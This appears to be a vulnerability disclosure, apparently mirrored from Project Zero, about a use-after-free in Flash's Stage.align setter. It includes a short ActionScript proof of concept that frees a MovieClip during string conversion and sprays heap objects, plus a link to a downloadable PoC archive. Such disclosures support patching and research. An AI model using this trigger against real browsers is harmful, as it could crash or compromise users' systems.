26 lines
No EOL
958 B
Text
26 lines
No EOL
958 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=838
|
|
|
|
There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.
|
|
|
|
A proof-of-concept is as follows:
|
|
|
|
this.createEmptyMovieClip("mc", 2);
|
|
var o = { toString : f };
|
|
mc.func = ASnative(666, 4); //Stage.align setter
|
|
mc.func(o);
|
|
|
|
function f(){
|
|
|
|
trace("here");
|
|
mc.removeMovieClip();
|
|
for(var i = 0; i < 100; i++){
|
|
var t = new TextFormat(); // fill up the slots
|
|
|
|
}
|
|
}
|
|
|
|
A fla and swf are attached. The swf crashes in Chrome for Windows.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40308.zip |